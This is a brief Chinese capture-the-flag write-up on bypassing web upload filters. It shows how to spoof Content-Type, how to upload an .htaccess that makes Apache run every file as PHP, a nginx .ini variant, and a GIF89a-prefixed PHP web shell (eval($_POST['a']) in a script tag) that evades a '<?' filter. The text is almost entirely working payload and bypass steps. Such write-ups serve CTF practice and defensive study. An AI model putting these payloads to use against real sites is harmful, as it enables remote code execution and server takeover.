0x00 知识点
文件类型绕过:
Content-Type: image/jpeg
apache环境下上传.hatcess
首先上传一个.htaccess内容如下的文件
:SetHandler application/x-httpd-php
这样所有文件都会解析为php,然后再上传图片马,就可以解析
这里多说一下nginx我们可以尝试.ini配置文件:
文件名后缀不能是 ph 开头,文件内容过滤<?
长传这样的图片马:
GIF89a?
<script language="php">eval($_POST['a']);</script>
0x01 解题
emm简单测试一下就getshell了:
